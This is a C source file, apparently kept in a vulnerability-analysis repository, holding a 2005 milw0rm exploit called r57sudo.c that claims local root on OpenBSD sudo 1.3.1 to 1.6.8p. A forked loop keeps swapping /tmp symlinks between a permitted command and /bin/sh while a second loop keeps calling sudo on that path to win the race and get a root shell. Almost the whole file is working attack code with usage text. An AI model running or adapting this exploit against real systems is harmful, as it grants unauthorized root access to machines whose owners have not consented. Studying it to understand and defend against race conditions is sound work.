lilbool/vuln-code-analysis
0
1#include <stdio.h>
2#include <stdlib.h>
3#include <unistd.h>
4#include <sysexits.h>
5#include <sys/wait.h>
6
7#define SUDO "/usr/bin/sudo"
8#ifdef BUFSIZ
9#undef BUFSIZ
10#define BUFSIZ 128
11#endif
12
13/*
14ANY MODIFIED REPUBLISHING IS RESTRICTED
15OpenBSD sudo 1.3.1 - 1.6.8p local root exploit
16Tested under OpenBSD 3.6 sudo 1.6.7p5
17Vuln by OpenBSD errata, http://www.openbsd.org/errata.html
18(c)oded by __blf 2005 RusH Security Team, http://rst.void.ru
19Race condition in path name, can take a while to exploit
20Gr33tz: x97Rang, whice, rsh, MishaSt, Inck-Vizitor, BlackPrince
21Fck lamerz: Saint_I, nmalykh
22All rights reserved.
23ANY MODIFIED REPUBLISHING IS RESTRICTED
24*/
25
26int main (int argc, char ** argv)
27{
28pid_t pid;
29void * buffer;
30char * exec, * race, * path;
31if(argc != 3)
32{
33fprintf(stderr, "r57sudo.c by __blf\n");
34fprintf(stderr, "RusH Security Team\n");
35fprintf(stderr, "Usage: %s <sudo full path command> <sudo command>\n",
36argv[0]);
37fprintf(stderr, "e.g. ./r57sudo /bin/ls ls\n");
38return EX_USAGE;
39}
40pid = fork();
41if(pid == 0)
42{
43while(1)
44{
45exec = (char *)calloc(BUFSIZ, sizeof(char));
46race = (char *)calloc(BUFSIZ, sizeof(char));
47bzero(exec, sizeof(exec));
48snprintf(exec, BUFSIZ, "ln -fs %s /tmp/%s", argv[1], argv[2]);
49system((char *)exec);
50bzero(race, sizeof(race));
51snprintf(race, BUFSIZ, "rm /tmp/%s", argv[2]);
52system((char *)race);
53bzero(race, sizeof(race));
54snprintf(race, BUFSIZ, "ln -fs /bin/sh /tmp/%s", argv[2]);
55system((char *)race);
56bzero(race, sizeof(race));
57snprintf(race, BUFSIZ, "rm /tmp/%s", argv[2]);
58system((char *)race);
59}
60}
61if(pid > 0)
62{
63while(1)
64{
65path = (char *)calloc(BUFSIZ/2, sizeof(char));
66snprintf(path, BUFSIZ/2, "%s /tmp/%s", SUDO, argv[2]);
67system((char *)path);
68}
69}
70}
71
72// milw0rm.com [2005-07-04]